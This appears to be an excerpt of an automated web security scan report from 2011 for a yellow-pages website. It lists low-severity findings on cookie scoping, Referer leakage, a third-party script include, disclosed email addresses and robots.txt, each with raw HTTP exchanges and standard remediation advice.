GET /profiler/abook.jsp HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Pragma: public Cache-Control: max-age=0 Set-Cookie: JSESSIONID=9349333F823CAE7CC6FEBB66A7259273; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 63675 Date: Thu, 03 Feb 2011 17:09:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
Request
GET /listings.jsp?C=florists HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
GET /listings.jsp?C=florists HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
GET /profile.jsp?LID%3D HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=47569E3E31CC750A459D1E34242979C8; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 56821 Date: Thu, 03 Feb 2011 17:09:51 GMT Connection: close
GET /profiler/abook.jsp?requestAction=toCoupons HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Pragma: public Cache-Control: max-age=0 Set-Cookie: JSESSIONID=DBCDFB9F9B9263905676A09E7556E316; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 63867 Date: Thu, 03 Feb 2011 17:09:48 GMT Connection: close
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
The response dynamically includes the following script from another domain:
http://w.sharethis.com/button/sharethis.js
Request
GET /listings.jsp HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=A128B8617DC8ADD934177CBF98AE8973; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 56902 Date: Thu, 03 Feb 2011 17:09:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... <li class="share"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&type=website&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script> ...[SNIP]...
The response dynamically includes the following script from another domain:
http://w.sharethis.com/button/sharethis.js
Request
GET /profile.jsp HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=34F8CD7F11AAE29FCDCADE0C5D2C054F; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 56809 Date: Thu, 03 Feb 2011 17:09:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... <li class="share"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&type=website&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script> ...[SNIP]...
The response dynamically includes the following script from another domain:
http://w.sharethis.com/button/sharethis.js
Request
GET /profiler/abook.jsp HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Pragma: public Cache-Control: max-age=0 Set-Cookie: JSESSIONID=9349333F823CAE7CC6FEBB66A7259273; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 63675 Date: Thu, 03 Feb 2011 17:09:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <li class="share"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&type=website&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script> ...[SNIP]...
6. Email addresses disclosedpreviousnext There are 5 instances of this issue:
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email address was disclosed in the response:
klaus.hartl@stilbuero.de
Request
GET /common/js/jquery-plugins.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" ETag: W/"22447-1296159280000" Last-Modified: Thu, 27 Jan 2011 20:14:40 GMT Content-Type: text/javascript Date: Thu, 03 Feb 2011 16:00:26 GMT Content-Length: 20498
.../** * jQuery.ScrollTo * Copyright (c) 2007-2009 Ariel Flesler - aflesler(at)gmail(dot)com | http://flesler.blogspot.com * Dual licensed under MIT and GPL. * Date: 5/25/2009 * * @projectDescription ...[SNIP]... e secure attribute of the cookie will be set and the cookie transmission will * require a secure protocol (like HTTPS). * @type undefined * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ /** * Get the value of a cookie with the given name. * * @example $.cookie('the_cookie'); * @desc Get the value of a cookie. * * @param String name The name of the cookie. * @return The value of the cookie. * @type String * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { // name and value given, set cookie options = options || {}; if (value === null) { value = ''; options.expires = ...[SNIP]...
The following email address was disclosed in the response:
klaus.hartl@stilbuero.de
Request
GET /common/js/jquery.history_remote.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" ETag: W/"14324-1296159270000" Last-Modified: Thu, 27 Jan 2011 20:14:30 GMT Content-Type: text/javascript Date: Thu, 03 Feb 2011 16:00:29 GMT Content-Length: 12074
/** * History/Remote - jQuery plugin for enabling history support and bookmarking * @requires jQuery v1.0.3 * * http://stilbuero.de/jquery/history/ * * Copyright (c) 2006 Klaus Hartl (stilbuero.de) * ...[SNIP]... t will overwrite the default action of * emptying all containers that are used to load content into. * @type undefined * * @name $.ajaxHistory.initialize() * @cat Plugins/History * @author Klaus Hartl/klaus.hartl@stilbuero.de */ $.ajaxHistory = new function() { var RESET_EVENT = 'historyReset'; var _currentHash = location.hash; var _intervalId = null; var _observeHistory; // define outside if/else required by Opera this.up ...[SNIP]... . Default value: "remote-". * @param Function callback A single function that will be executed when the request is complete. * @type jQuery * * @name remote * @cat Plugins/Remote * @author Klaus Hartl/klaus.hartl@stilbuero.de */ /** * Implement Ajax driven links in a completely unobtrusive and accessible manner (also known as "Hijax") * with support for the browser's back/forward navigation buttons and bookmarking. * * The ...[SNIP]... . Default value: "remote-". * @param Function callback A single function that will be executed when the request is complete. * @type jQuery * * @name remote * @cat Plugins/Remote * @author Klaus Hartl/klaus.hartl@stilbuero.de */ $.fn.remote = function(output, settings, callback) { callback = callback || function() {}; if (typeof settings == 'function') { // shift arguments callback = settings; } settings = $.extend({ hashP ...[SNIP]... the value of the URL fragment identifier, e.g. if its * current value matches the href attribute of the matched element. * * @type jQuery * * @name history * @cat Plugins/History * @author Klaus Hartl/klaus.hartl@stilbuero.de */ $.fn.history = function(callback) { return this.click(function(e) { // add to history only if true click occured, // not a triggered click... if (e.clientX) { // ...and die if already active if (th ...[SNIP]...
The following email address was disclosed in the response:
xxx@proxymail.facebook.com
Request
GET /listings.jsp HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=A128B8617DC8ADD934177CBF98AE8973; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 56902 Date: Thu, 03 Feb 2011 17:09:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... <td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td> ...[SNIP]...
The following email address was disclosed in the response:
xxx@proxymail.facebook.com
Request
GET /profile.jsp HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=34F8CD7F11AAE29FCDCADE0C5D2C054F; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 56809 Date: Thu, 03 Feb 2011 17:09:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... <td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td> ...[SNIP]...
The following email address was disclosed in the response:
xxx@proxymail.facebook.com
Request
GET /profiler/abook.jsp HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Pragma: public Cache-Control: max-age=0 Set-Cookie: JSESSIONID=9349333F823CAE7CC6FEBB66A7259273; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 63675 Date: Thu, 03 Feb 2011 17:09:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td> ...[SNIP]...
The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.
The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.
Issue remediation
The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.
Request
GET /robots.txt HTTP/1.0 Host: yellowpages.superpages.com
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750604329-yellowpages.superpages.com-18392944-420872; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:04 GMT; Path=/ ETag: W/"123-1296178919000" Last-Modified: Fri, 28 Jan 2011 01:41:59 GMT Content-Type: text/plain Content-Length: 123 Date: Thu, 03 Feb 2011 16:30:03 GMT Connection: close